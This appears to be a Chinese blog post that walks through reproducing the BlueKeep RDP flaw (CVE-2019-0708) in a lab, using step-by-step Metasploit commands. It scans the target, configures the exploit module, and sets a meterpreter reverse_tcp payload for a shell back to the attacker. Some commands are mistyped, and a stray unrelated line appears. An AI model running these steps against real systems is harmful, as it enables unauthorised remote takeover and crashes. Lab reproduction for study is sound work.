CVE-2019-0708漏洞复现
漏洞概述
远程桌⾯服务⾼危远程代码执⾏漏洞(CVE-2019-0708),⽼是有系统爆这个漏洞,但是很少能有利⽤的,今天搭环境来测试以下利⽤条件。涉及系统版本
Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
不涉及系统版本
spring framework rce漏洞复现windows 10
windows 8
漏洞复测
攻击机:kali2021 IP: 192.168.2.103
靶机:windows7 IP:192.168.2.109
1、搜索msf⽀持的0708模块
search 0708
2、利⽤扫描模块探测⽬标系统是否存在漏洞
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
use rhosts 192.168.2.109 //设置⽬标
run
表⽰⽬标存在0708漏洞
3、设置攻击模块参数
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //设置攻击模块
show options
set rhosts 192.168.2.109 //设置⽬标
set lhost 192.168.2.103 //设置shell监听IP,监听端⼝默认即可
set payload windows/x64/meterpreter/reverse_tcp //设置payload
4、设置攻击模式,最终攻击设置如下图
show optinos targets //查看攻击模块⽀持的系统
set target 1 //设置攻击模块模式1
show options
5、执⾏攻击获取meterpreter,看起来⼀切顺利
run
6、多运⾏⼏次payload,发现计算机蓝屏
声明
严禁读者利⽤以上介绍知识点对⽹站进⾏⾮法操作 , 本⽂仅⽤于技术交流和学习 , 如果您利⽤⽂章中介绍的知识对他⼈造成损失 , 后果由您⾃⾏承担 , 如果您不能同意该约定 , 请您务必不要阅读该⽂章 , 感谢您的配合!
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论